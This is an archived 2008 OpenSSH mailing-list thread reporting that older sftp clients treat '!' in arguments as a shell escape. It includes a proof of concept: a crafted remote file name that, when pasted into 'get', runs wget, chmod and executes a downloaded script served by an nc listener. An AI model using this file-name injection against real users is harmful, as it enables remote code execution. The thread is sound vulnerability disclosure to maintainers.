Strange sftp input parameter handling, user assisted code execution?

Roman Fiedler roman.fiedler at
Wed Jun 18 17:23:09 EST 2008

Damien Miller wrote:
> On Wed, 18 Jun 2008, Damien Miller wrote:
>> On Tue, 17 Jun 2008, Roman Fiedler wrote:
>>> Hello list,
>>> I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
>>> sftp>  get !xxxx
>>> /bin/bash: xxxx: command not found
>>> Shell exited with status 127
>> Can you reproduce this with OpenSSH 5.0p1?
> I can't reproduce this with 5.0, but I can with 4.7p1 so I guess
> it was fixed in my sftp argument processing rewrite.
> -d

Thats good. I was just confused that the ! did also work for the 
arguments and not only in front of a command (!get). I just did not 
think that copy/pasting a remote filename to a get could cause this 

I looked at it a little bit closer and found that only direct copy and 
paste of filenames from "ls" output can be harmful, no problem with mget *.

lg roman

PS: You were correct that the /bin/bash test did not work, that was a 
mistake during testing, but other testcase works:

   cd Tmp
   touch '!wget -O cmds ; chmod 0755 cmds ; . cmds'
   nc -vnlp 1234

   When connected send:
HTTP/1.1 200 OK
Content-Length: 60

echo "This output is from remote command!"
# padding ................................

sftp> cd Tmp
sftp> ls
!wget -O cmds ; chmod 0755 cmds ; . cmds 

sftp> get !wget -O cmds ; chmod 0755 cmds ; . cmds
            => `cmds'
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 70

100%[====================================>] 70            --.--K/s 

09:09:36 (102.05 KB/s) - `cmds' saved [70/70]

This output is from remote command!

(The wget line is splitted across lines, in mail client, make sure to 
have one line in test).

More information about the openssh-unix-dev mailing list